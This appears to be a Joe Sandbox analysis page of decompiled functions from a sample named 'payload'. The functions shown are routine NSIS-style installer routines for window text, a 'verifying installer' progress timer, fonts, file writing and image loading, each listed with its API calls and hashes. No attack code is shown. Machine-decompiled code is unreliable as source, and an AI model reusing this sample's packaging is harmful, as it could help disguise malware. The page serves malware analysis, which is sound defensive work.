Instruction ID: 4e6b36a645f71e2aed4a85f2c36ff1861f2741140ba068ae73f9b0a79c1593cf
Opcode Fuzzy Hash: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
Instruction Fuzzy Hash: EA319CB1504250EFF322CF64CCC4C6B7BBDEB852D4B124529FA4193168CB31AC94DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00404F12 Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404F12(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x422ee4; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x4237b4;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405D1B(0, _t39, 0x41f4e8, 0x41f4e8, _a4);
					}
					_t26 = lstrlenA(0x41f4e8);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x422ec8, 0x41f4e8);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41f4e8;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41f4e8)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41f4e8, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x00404f18
0x00404f24
0x00404f27
0x00404f2d
0x00404f39
0x00404f3c
0x00404f3f
0x00404f45
0x00404f45
0x00404f4b
0x00404f53
0x00404f56
0x00404f73
0x00404f77
0x00404f80
0x00404f80
0x00404f8a
0x00404f93
0x00404f9f
0x00404fa6
0x00404faa
0x00404fad
0x00404fc0
0x00404fce
0x00404fce
0x00404fd2
0x00404fd4
0x00404fd7
0x00000000
0x00404fd7
0x00404f58
0x00404f60
0x00404f68
0x00404f6e
0x00000000
0x00404f6e
0x00404f68
0x00404f56
0x00404fe1

APIs

lstrlenA.KERNEL32(0041F4E8,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4B
lstrlenA.KERNEL32(00402FCF,0041F4E8,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5B
lstrcatA.KERNEL32(0041F4E8,00402FCF,00402FCF,0041F4E8,00000000,0040E8C0,00000000), ref: 00404F6E
SetWindowTextA.USER32(0041F4E8,0041F4E8), ref: 00404F80
SendMessageA.USER32 ref: 00404FA6
SendMessageA.USER32 ref: 00404FC0
SendMessageA.USER32 ref: 00404FCE

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 558402415f57fe0eb81db75807d2d057a66030d2c136bde9c432be6294094776
Instruction ID: 5a9a404093729f8c7a4ed64dcb73daf90ff889549f225b9df3951733f5861a8d
Opcode Fuzzy Hash: 558402415f57fe0eb81db75807d2d057a66030d2c136bde9c432be6294094776
Instruction Fuzzy Hash: EB219DB1A00119BADF119FA5DD84ADEBFB9EF44354F14807AF904B6290C7788E41DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004047DD Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004047DD(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x004047eb
0x004047f8
0x004047fe
0x0040483c
0x0040483c
0x0040484b
0x00404852
0x00000000
0x00404854
0x00404800
0x0040480f
0x00404817
0x0040481a
0x0040482c
0x00404832
0x00404839
0x00000000
0x00404839
0x00000000

APIs

SendMessageA.USER32 ref: 004047F8
GetMessagePos.USER32 ref: 00404800
ScreenToClient.USER32(?,?), ref: 0040481A
SendMessageA.USER32 ref: 0040482C
SendMessageA.USER32 ref: 00404852

Strings

f, xrefs: 0040482E

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction ID: 206dc1e0429e6aa6b627cd25208fa2295557d59b2a7717453fa0c9894da25502
Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction Fuzzy Hash: E6015276D00259BADB01DB94DC45FFEBBBCAF55711F10412BBA10B61C0C7B4A501CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402B7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B7F(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x40a8b8; // 0x45372
					_t11 =  *0x4168c4; // 0x47258
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402b8c
0x00402b9a
0x00402ba0
0x00402ba0
0x00402bae
0x00402bb0
0x00402bb6
0x00402bbd
0x00402bbf
0x00402bbf
0x00402bd5
0x00402be5
0x00402bf7
0x00402bf7
0x00402bff

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
MulDiv.KERNEL32 ref: 00402BC5
wsprintfA.USER32 ref: 00402BD5
SetWindowTextA.USER32(?,?), ref: 00402BE5
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7

Strings

verifying installer: %d%%, xrefs: 00402BCF

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 649971ee7512e9da800057b1e5ac373431693e3f4f1e876899c067cd5a0faa84
Instruction ID: bd73235a5a2a729140de961e31d76a0e47d27260d0eaef7d75f80e35c4c54abd
Opcode Fuzzy Hash: 649971ee7512e9da800057b1e5ac373431693e3f4f1e876899c067cd5a0faa84
Instruction Fuzzy Hash: EF01F471540208BBEF109F60DD49EEE3B79EB04305F008039FA16B51D1D7B59955DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00401D38 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00401D38() {
				void* __esi;
				int _t7;
				signed char _t13;
				struct HFONT__* _t16;
				void* _t20;
				struct HDC__* _t26;
				void* _t28;
				void* _t30;

				_t26 = GetDC( *(_t30 - 8));
				_t7 = GetDeviceCaps(_t26, 0x5a);
				0x40a7f0->lfHeight =  ~(MulDiv(E00402A1D(2), _t7, 0x48));
				ReleaseDC( *(_t30 - 8), _t26);
				 *0x40a800 = E00402A1D(3);
				_t13 =  *((intOrPtr*)(_t30 - 0x18));
				 *0x40a807 = 1;
				 *0x40a804 = _t13 & 0x00000001;
				 *0x40a805 = _t13 & 0x00000002;
				 *0x40a806 = _t13 & 0x00000004;
				E00405D1B(_t20, _t26, _t28, "Tahoma",  *((intOrPtr*)(_t30 - 0x24)));
				_t16 = CreateFontIndirectA(0x40a7f0);
				_push(_t16);
				_push(_t28);
				E00405C57();
				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x00401d41
0x00401d48
0x00401d63
0x00401d68
0x00401d75
0x00401d7a
0x00401d85
0x00401d8c
0x00401d9e
0x00401da4
0x00401da9
0x00401db3
0x00402513
0x00401561
0x00402877
0x004028d2
0x004028de

APIs

GetDC.USER32(?), ref: 00401D3B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
MulDiv.KERNEL32 ref: 00401D57
ReleaseDC.USER32(?,00000000), ref: 00401D68
CreateFontIndirectA.GDI32(0040A7F0), ref: 00401DB3

Strings

Tahoma, xrefs: 00401D99

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Tahoma
API String ID: 3808545654-3580928618
Opcode ID: 54d11e4959632539d7c5822479490e62378c8afe9ef9106c9a33de1f24eaef6b
Instruction ID: 818c9bdddfe1b1fffd76dbb1b88acba4993fd419864b94457e62d7fc32e1ff32
Opcode Fuzzy Hash: 54d11e4959632539d7c5822479490e62378c8afe9ef9106c9a33de1f24eaef6b
Instruction Fuzzy Hash: FE016232948740AFE7416B70AE1AFAA3FB4A755305F108479F201B72E3C67811569B3F

Uniqueness

Uniqueness Score: -1.00%

Function 004026C6 Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004026C6(void* __ebx) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402A3A(0xfffffff0);
				 *(_t56 - 0x38) = _t23;
				if(E004057D8(_t50) == 0) {
					E00402A3A(0xffffffed);
				}
				E00405947(_t50);
				_t26 = E0040596C(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x423714;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403091(_t45);
						E0040307B(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x34) = _t54;
						if(_t54 != _t45) {
							_push( *(_t56 - 0x20));
							_push(_t54);
							_push(_t45);
							_push( *((intOrPtr*)(_t56 - 0x24)));
							E00402E9F();
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x50) =  *_t54;
								E00405927( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x50);
							}
							GlobalFree( *(_t56 - 0x34));
						}
						E00405A13( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						_push(_t45);
						_push(_t45);
						_push( *(_t56 + 8));
						_push(0xffffffff);
						 *((intOrPtr*)(_t56 - 0xc)) = E00402E9F();
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x38));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}

0x004026c6
0x004026c8
0x004026d4
0x004026d7
0x004026e1
0x004026e5
0x004026e5
0x004026eb
0x004026f8
0x00402700
0x00402703
0x00402709
0x00402717
0x0040271c
0x00402720
0x00402723
0x0040272c
0x00402738
0x0040273c
0x0040273f
0x00402741
0x00402744
0x00402745
0x00402746
0x00402749
0x00402768
0x00402750
0x00402755
0x0040275d
0x00402760
0x00402765
0x00402765
0x0040276f
0x0040276f
0x0040277c
0x00402782
0x00402788
0x00402789
0x0040278a
0x0040278d
0x00402794
0x00402794
0x0040279a
0x0040279a
0x004027a5
0x004027a6
0x004027aa
0x004027ae
0x004027b4
0x004027b4
0x004027bb
0x004021c4
0x004028d2
0x004028de

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
GlobalFree.KERNEL32(?), ref: 0040276F
GlobalFree.KERNEL32(00000000), ref: 00402782
CloseHandle.KERNEL32(?), ref: 0040279A
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 39fbd17f46fc9c371fd9deabdbb1a4d81bf886de883c9339f90e348bb50c0e41
Instruction ID: 55e8cf3ffad71cabca96213aa966ad8f6b0c6824c0bc9dabfeb9c0d6c9f08848
Opcode Fuzzy Hash: 39fbd17f46fc9c371fd9deabdbb1a4d81bf886de883c9339f90e348bb50c0e41
Instruction Fuzzy Hash: 03217C71800124BBCF216FA5DE89EAE7A79EF09324F14023AF950762D1C7795D418FA9

Uniqueness

Uniqueness Score: -1.00%

Function 1000180D Relevance: 7.7, APIs: 5, Instructions: 189
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E1000180D(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v52;
				void* _t43;
				signed int _t44;
				signed int _t59;
				void _t63;
				void _t64;
				signed int _t65;
				signed int _t67;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t80;
				signed int _t84;
				signed int _t86;
				signed int _t89;
				void* _t100;

				_t84 = __edx;
				 *0x1000405c = _a8;
				_t59 = 0;
				 *0x10004060 = _a16;
				_v12 = 0;
				_v8 = E1000123B();
				_t89 = E100012FE(_t41);
				_t86 = _t84;
				_t43 = E1000123B();
				_t63 =  *_t43;
				_a8 = _t43;
				if(_t63 != 0x7e && _t63 != 0x21) {
					_a16 = E1000123B();
					_t59 = E100012FE(_t56);
					_v12 = _t84;
					GlobalFree(_a16);
					_t43 = _a8;
				}
				_t64 =  *_t43;
				_t100 = _t64 - 0x2f;
				if(_t100 > 0) {
					_t65 = _t64 - 0x3c;
					__eflags = _t65;
					if(_t65 == 0) {
						__eflags =  *((char*)(_t43 + 1)) - 0x3c;
						if( *((char*)(_t43 + 1)) != 0x3c) {
							__eflags = _t86 - _v12;
							if(__eflags > 0) {
								L54:
								_t44 = 0;
								__eflags = 0;
								L55:
								asm("cdq");
								L56:
								_t89 = _t44;
								L57:
								_t86 = _t84;
								L58:
								E10001429(_t84, _t89, _t86,  &_v52);
								E10001266( &_v52);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L47:
								__eflags = 0;
								L48:
								_t44 = 1;
								goto L55;
							}
							__eflags = _t89 - _t59;
							if(_t89 < _t59) {
								goto L47;
							}
							goto L54;
						}
						_t84 = _t86;
						_t44 = E10002CD0(_t89, _t59, _t84);
						goto L56;
					}
					_t67 = _t65 - 1;
					__eflags = _t67;
					if(_t67 == 0) {
						__eflags = _t89 - _t59;
						if(_t89 != _t59) {
							goto L54;
						}
						__eflags = _t86 - _v12;
						if(_t86 != _v12) {
							goto L54;
						}
						goto L47;
					}
					_t68 = _t67 - 1;
					__eflags = _t68;
					if(_t68 == 0) {
						__eflags =  *((char*)(_t43 + 1)) - 0x3e;
						if( *((char*)(_t43 + 1)) != 0x3e) {
							__eflags = _t86 - _v12;
							if(__eflags < 0) {
								goto L54;
							}
							if(__eflags > 0) {
								goto L47;
							}
							__eflags = _t89 - _t59;
							if(_t89 <= _t59) {
								goto L54;
							}
							goto L47;
						}
						_t84 = _t86;
						_t44 = E10002CF0(_t89, _t59, _t84);
						goto L56;
					}
					_t70 = _t68 - 0x20;
					__eflags = _t70;
					if(_t70 == 0) {
						_t89 = _t89 ^ _t59;
						_t86 = _t86 ^ _v12;
						goto L58;
					}
					_t71 = _t70 - 0x1e;
					__eflags = _t71;
					if(_t71 == 0) {
						__eflags =  *((char*)(_t43 + 1)) - 0x7c;
						if( *((char*)(_t43 + 1)) != 0x7c) {
							_t89 = _t89 | _t59;
							_t86 = _t86 | _v12;
							goto L58;
						}
						__eflags = _t89 | _t86;
						if((_t89 | _t86) != 0) {
							goto L47;
						}
						__eflags = _t59 | _v12;
						if((_t59 | _v12) != 0) {
							goto L47;
						}
						goto L54;
					}
					__eflags = _t71 == 0;
					if(_t71 == 0) {
						_t89 =  !_t89;
						_t86 =  !_t86;
					}
					goto L58;
				}
				if(_t100 == 0) {
					L21:
					__eflags = _t59 | _v12;
					if((_t59 | _v12) != 0) {
						_v24 = E10002B60(_t89, _t86, _t59, _v12);
						_v20 = _t84;
						_t89 = E10002C10(_t89, _t86, _t59, _v12);
						_t43 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t84 = _t86;
					}
					__eflags =  *_t43 - 0x2f;
					if( *_t43 != 0x2f) {
						goto L57;
					} else {
						_t89 = _v24;
						_t86 = _v20;
						goto L58;
					}
				}
				_t76 = _t64 - 0x21;
				if(_t76 == 0) {
					_t44 = 0;
					__eflags = _t89 | _t86;
					if((_t89 | _t86) != 0) {
						goto L55;
					}
					goto L48;
				}
				_t77 = _t76 - 4;
				if(_t77 == 0) {
					goto L21;
				}
				_t78 = _t77 - 1;
				if(_t78 == 0) {
					__eflags =  *((char*)(_t43 + 1)) - 0x26;
					if( *((char*)(_t43 + 1)) != 0x26) {
						_t89 = _t89 & _t59;
						_t86 = _t86 & _v12;
						goto L58;
					}
					__eflags = _t89 | _t86;
					if((_t89 | _t86) == 0) {
						goto L54;
					}
					__eflags = _t59 | _v12;
					if((_t59 | _v12) == 0) {
						goto L54;
					}
					goto L47;
				}
				_t79 = _t78 - 4;
				if(_t79 == 0) {
					_t44 = E10002B20(_t89, _t86, _t59, _v12);
					goto L56;
				} else {
					_t80 = _t79 - 1;
					if(_t80 == 0) {
						_t89 = _t89 + _t59;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t80 == 0) {
							_t89 = _t89 - _t59;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L58;
				}
			}

0x1000180d
0x10001817
0x10001820
0x10001823
0x10001828
0x10001831
0x1000183a
0x1000183c
0x1000183e
0x10001843
0x10001845
0x1000184b
0x10001858
0x10001861
0x10001866
0x10001869
0x1000186f
0x1000186f
0x10001872
0x10001875
0x10001878
0x1000193e
0x1000193e
0x10001941
0x100019aa
0x100019ae
0x100019bd
0x100019c0
0x100019c8
0x100019c8
0x100019c8
0x100019ca
0x100019ca
0x100019cb
0x100019cb
0x100019cd
0x100019cd
0x100019cf
0x100019d5
0x100019de
0x100019ef
0x100019fa
0x100019fa
0x100019c2
0x100019a5
0x100019a5
0x100019a7
0x100019a7
0x00000000
0x100019a7
0x100019c4
0x100019c6
0x00000000
0x00000000
0x00000000
0x100019c6
0x100019b2
0x100019b6
0x00000000
0x100019b6
0x10001943
0x10001943
0x10001944
0x1000199c
0x1000199e
0x00000000
0x00000000
0x100019a0
0x100019a3
0x00000000
0x00000000
0x00000000
0x100019a3
0x10001946
0x10001946
0x10001947
0x1000197c
0x10001980
0x1000198f
0x10001992
0x00000000
0x00000000
0x10001994
0x00000000
0x00000000
0x10001996
0x10001998
0x00000000
0x00000000
0x00000000
0x1000199a
0x10001984
0x10001988
0x00000000
0x10001988
0x10001949
0x10001949
0x1000194c
0x10001975
0x10001977
0x00000000
0x10001977
0x1000194e
0x1000194e
0x10001951
0x1000195d
0x10001961
0x1000196e
0x10001970
0x00000000
0x10001970
0x10001963
0x10001965
0x00000000
0x00000000
0x10001967
0x1000196a
0x00000000
0x00000000
0x00000000
0x1000196c
0x10001954
0x10001955
0x10001957
0x10001959
0x10001959
0x00000000
0x10001955
0x1000187e
0x100018f6
0x100018f8
0x100018fb
0x10001917
0x1000191a
0x10001925
0x10001927
0x100018fd
0x100018fd
0x10001901
0x10001905
0x10001905
0x1000192a
0x1000192d
0x00000000
0x10001933
0x10001933
0x10001936
0x00000000
0x10001936
0x1000192d
0x10001880
0x10001883
0x100018e7
0x100018e9
0x100018eb
0x00000000
0x00000000
0x00000000
0x100018f1
0x10001885
0x10001888
0x00000000
0x00000000
0x1000188a
0x1000188b
0x100018c1
0x100018c5
0x100018dd
0x100018df
0x00000000
0x100018df
0x100018c7
0x100018c9
0x00000000
0x00000000
0x100018cf
0x100018d2
0x00000000
0x00000000
0x00000000
0x100018d8
0x1000188d
0x10001890
0x100018b7
0x00000000
0x10001892
0x10001892
0x10001893
0x100018a7
0x100018a9
0x10001895
0x10001897
0x1000189d
0x1000189f
0x1000189f
0x10001897
0x00000000
0x10001893

APIs

GlobalFree.KERNEL32(?), ref: 10001869
GlobalFree.KERNEL32(?), ref: 100019EF
GlobalFree.KERNEL32(?), ref: 100019F4

Memory Dump Source

Source File: 00000001.00000002.1417066379.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.1417055818.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1417073030.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1417078966.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_payload.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 83a27a6a764e204457f331ddef67b06d43c1ca0f526d792f63dc3af4834dec0e
Instruction ID: adaf369aa6dab84e94bee76403d526b7d43184adb12fe210256c1aedb67fe499
Opcode Fuzzy Hash: 83a27a6a764e204457f331ddef67b06d43c1ca0f526d792f63dc3af4834dec0e
Instruction Fuzzy Hash: 43512536D04159AEFB55DFB488A4AEEBBF6EF453C0F124169E841B315DCA306E4087D2

Uniqueness

Uniqueness Score: -1.00%

Function 00401CDE Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401CDE(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x58);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A3A(_t21), _t21,  *(_t27 - 0x50) *  *(_t27 - 0x20),  *(_t27 - 0x4c) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401ce8
0x00401cef
0x00401d1e
0x00401d26
0x00401d2d
0x00401d2d
0x004028d2
0x004028de

APIs

GetDlgItem.USER32(?), ref: 00401CE2
GetClientRect.USER32 ref: 00401CEF
